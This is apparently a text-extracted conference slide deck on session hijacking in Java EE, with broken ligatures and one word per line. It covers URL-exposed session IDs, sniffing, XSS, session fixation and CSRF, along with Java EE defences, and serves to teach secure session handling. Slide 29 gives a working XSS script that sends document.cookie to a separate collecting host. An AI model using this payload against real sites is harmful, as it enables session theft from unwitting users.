1. The
Hacker’s
Guide
to
Session
Hijacking
in
Java
EE
Patrycja
Wegrzynowicz
CTO,
Yonita,
Inc.
JavaOne
2016
2. About
Me
• 15+
professional
experience
• SoRware
engineer,
architect,
head
of
soRware
R&D
• Author
and
speaker
• JavaOne,
Devoxx,
JavaZone,
TheServerSide
Java
Symposium,
Jazoon,
OOPSLA,
ASE,
others
• Top
10
Women
in
Tech
2016
in
Poland
• Founder
and
CTO
of
Yonita
• Automated
detecZon
and
refactoring
of
soRware
defects
• Trainings
and
code
reviews
• Security,
performance,
concurrency,
databases
• Twi[er
@yonlabs
3. About
Me
• 15+
professional
experience
• SoRware
engineer,
architect,
head
of
soRware
R&D
• Author
and
speaker
• JavaOne,
Devoxx,
JavaZone,
TheServerSide
Java
Symposium,
Jazoon,
OOPSLA,
ASE,
others
• Top
10
Women
in
Tech
2016
in
Poland
• Founder
and
CTO
of
Yonita
• Bridge
the
gap
between
the
industry
and
the
academia
• Automated
detecZon
and
refactoring
of
soRware
defects
• Trainings
and
code
reviews
• Security,
performance,
concurrency,
databases
• Twi[er
@yonlabs
9. What
is
Web
Session?
• Session
idenZfies
interacZons
with
one
user
• Unique
idenZfier
associated
with
every
request
• Cookie
• Header
• Parameter
• Hidden
field
15. Demo:
Session
Exposed
in
URL
• I
will
log
into
the
sample
applicaZon
• I
will
post
a
link
with
my
session
id
on
Twi[er
• @yonlabs
• Hijack
my
session
:)
16. How
to
Avoid
Session
Id
in
URL?
• Default:
allows
cookies
and
URL
rewriZng
• Default
cookie,
fall
back
on
URL
rewriZng
• To
embrace
all
users
• Disabled
cookies
in
a
browser
• Disable
URL
rewriZng
in
an
app
server
• App
server
specific
• Tracking
mode
• Java
EE
6,
web.xml
18. Session
Sniffing
• How
to
find
out
a
cookie?
• e.g.,
network
monitoring
and
packet
sniffing
• How
to
use
a
cookie?
• Browsers’
plugins
and
add-‐ons
(e.g.,
Cookie
Manager
for
Firefox)
• IntercepZng
proxy
(e.g.,
OWASP
ZAP)
• DIY:
write
your
own
code
19. Demo:
Session
Sniffing
• You
will
log
into
the
sample
applicaZon
• Any
non
empty
user
name
• Please,
use
meaningful
names!
• I
will
monitor
network
traffic
• tcpdump
• I
will
hijack
one
of
your
sessions
• Cookie
Manager
24. Session
Exposure
• Transport
• Unencrypted
transport
• Client-‐side
• XSS
• A[acks
on
browsers/OS
• Server-‐side
• Logs
• Session
replicaZon
• Memory
dump
25. How
to
Steal
a
Session
if
Secure
Transport
Is
Used?
26. How
to
Steal
a
Session
if
Secure
Transport
Is
Used?
A3ack
a
client!
27. Demo:
Session
Grabbed
by
XSS
• JavaScript
code
to
steal
a
cookie
• Servlet
to
log
down
stolen
cookies
• Vulnerable
applicaZon
to
be
exploited
via
injected
JavaScript
code
(XSS)
28. Demo:
Session
Grabbed
by
XSS
• I
will
store
malicious
JavaScript
code
in
the
app
• Through
wriZng
an
“opinion”
• Log
into
the
vulnerable
applicaZon
• h[ps://demo.yonita.com:8181/session-‐xss/
• Any
non
empty
user
name
• Please,
use
meaningful
names!
• Click
‚View
others
opinions’
page
• Wait
unZl
I
will
hijack
your
session
:)
29. JavaScript
to
Steal
a
Cookie
<script>
<!-‐-‐
hacker’s
service
-‐-‐>
theR
=
’h[p://demo.yonita.com/steal/steal?cookie=’
<!-‐-‐
to
bypass
Same
Origin
Policy
-‐-‐>
image
=
new
Image();
image.src
=
theR
+
document.cookie;
</script>
32. When
Session
is
Created?
A. On
storing
an
a[ribute
in
a
session
for
the
first
Zme
B. On
calling
request.getSession(true)
/()
for
the
first
Zme
C. On
a
successful
login
D. None
of
the
above
33. When
Session
is
Created?
A. On
storing
an
a[ribute
in
a
session
for
the
first
Zme
B. On
calling
request.getSession(true)/()
for
the
first
Zme
C. On
a
successful
login
D. None
of
the
above
34. When
Session
is
Created?
A. On
storing
an
a[ribute
in
a
session
for
the
first
Zme
B. On
calling
request.getSession(true)/()
for
the
first
Zme
• H[pServletRequest::getSession(true)
• H[pServletRequest::getSession()
• an
implicit
session
object
on
JSP
pages
• unless
<%@
page
session="false"
%>
C. On
a
successful
login
D. None
of
the
above
35. Session
FixaZon:
Scenario
1
• Hacker
opens
a
web
page
of
a
system
in
a
browser
• JSP
page:
a
new
session
iniZalized!
• Hacker
writes
down
the
session
id
• Hacker
leaves
the
browser
open
• User
comes
and
logs
into
the
app
• Uses
the
session
iniZalized
by
the
hacker
• Hacker
uses
the
wri[en
down
session
id
to
hijack
the
user’s
session
36. Session
FixaZon:
Scenario
2
• Hacker
opens
a
web
page
of
a
system
in
a
browser
• JSP
page:
a
new
session
iniZalized!
• Hacker
prepares
a
link
with
the
session
id
in
URL
• Hacker
tricks
a
user
to
click
the
link
• e.g.
sends
an
email
with
the
link
• User
clicks
the
link
• Uses
the
session
iniZalized
by
the
hacker
• Hacker
uses
the
wri[en
down
session
id
to
hijack
the
user’s
session
37. Session
FixaZon:
SoluZon
• Change
the
session
ID
aRer
a
successful
login
• more
generally:
escalaZon
of
privileges
38. Servlet
3.0/3.1
Spec
• Containers
may
create
HTTP
Session
objects
to
track
login
state.
If
a
developer
creates
a
session
while
a
user
is
not
authenZcated,
and
the
container
then
authenZcates
the
user,
the
session
visible
to
developer
code
a=er
login
must
be
the
same
session
object
that
was
created
prior
to
login
occurring
so
that
there
is
no
loss
of
session
informaZon.
39. Session
FixaZon:
SoluZon
in
Java
EE
• Change
the
session
ID
aRer
a
successful
login
• more
generally:
escalaZon
of
privileges
• Java
EE
7
(Servlet
3.1)
• H[pServletRequest.changeSessionId()
• Java
EE
6
• H[pSession.invalidate()
• H[pServletRequest.getSession(true)
40. Secure
Session
Management
Best
PracZces
• Random,
unpredictable
session
id
• At
least
16
characters
• Secure
transport
and
storage
of
session
id
• Cookie
preferred
over
URL
rewriZng
• Cookie
flags:
secure,
h[pOnly
• Don’t
use
too
broad
cookie
paths
• Consistent
use
of
HTTPS
• Don’t
mix
HTTP
and
HTTPS
under
the
same
domain/cookie
path
41. Consistent
Use
of
HTTPS
Typical
Errors
• StaZc
content
served
as
HTTP
from
the
same
domain
name
• Pre-‐authenZcated
pages
as
HTTP,
post-‐authenZcated
pages
as
HTTPS
from
the
same
domain
name
• Login
form
as
HTTPS,
the
rest
as
HTTP
• GMail
for
a
few
years
aRer
its
launch!
42. Secure
AuthenZcaZon
Best
PracZces
• Session
creaZon
and
destrucZon
• New
session
id
aRer
login
• Logout
bu[on
• Session
Zmeouts:
2”-‐5”
for
criZcal
apps,
15”-‐30”
for
typical
apps
• DetecZng
session
anomalies
• Basic
heurisZc:
a
session
associated
with
the
headers
of
the
first
request
• The
fingerprint
of
a
first
reques:
IP,
User-‐Agent,…
• If
they
don’t
match,
something’s
going
on
(invalidate!)
• OWASP
ModSecurity
Web
ApplicaZon
Firewall
• Rules
for
detecZng
common
security
a[acks
43. Secure
AuthenZcaZon
Best
PracZces
cont.
• Java
EE
• DeclaraZve
authenZcaZon
implemented
using
descriptors
• ProgrammaZc
authenZcaZon
• AnnotaZons,
H[pServletRequest:
authenZcate,
login,
logout
• Advanced
flows
and
requirements
• Custom
implementaZon
• Servlet
3.0
vs
3.1
• the
session
visible
to
developer
code
a=er
login
must
be
the
same
session
object
that
was
created
prior
to
login
• Session
fixaZon
problem
• 3.0:
no
way
to
change
a
session
id!
• 3.1:
changeSessionId
• Check
out
the
container
implementaZons
• Java
EE
6
vs.
Java
EE
7
44. Secure
AuthenZcaZon
Best
PracZces
cont.
• My
choice
• DeclaraZve
authenZcaZon
with
Java
EE
7
• Check
out
your
applicaZon
server
behavior!
• ProgrammaZc
authenZcaZon
with
Java
EE
6
or
when
advanced
flow
need
in
Java
EE
7
• H[pServletRequest:
authenZcate,
login,
logout
• Custom
implementaZon
46. What
If
We
Can’t
Steal
a
Cookie?
We
can
sDll
use
it!
47. Demo:
CSRF
to
Use
a
Cookie
• I
will
log
into
the
applicaZon
• Log
into
the
applicaZon
• h[ps://demo.yonita.com:8181/session-‐csrf/
• Any
non
empty
user
name
• Please,
use
meaningful
names!
• Click
the
link
and
the
bu[on
‘Click
me’
• h[ps://demo.yonita.com:8181/a[ack-‐csrf/
• I
will
check
my
account
balance
:)
48. CSRF:
SoluZon
• Use
a
unique
token
for
each
request
• anZ-‐CSRF
token
• Remember
about
your
web
forms
and
REST
services
• POST
requests
• Other
HTTP
acZons
as
needed
• Web
framework
dependent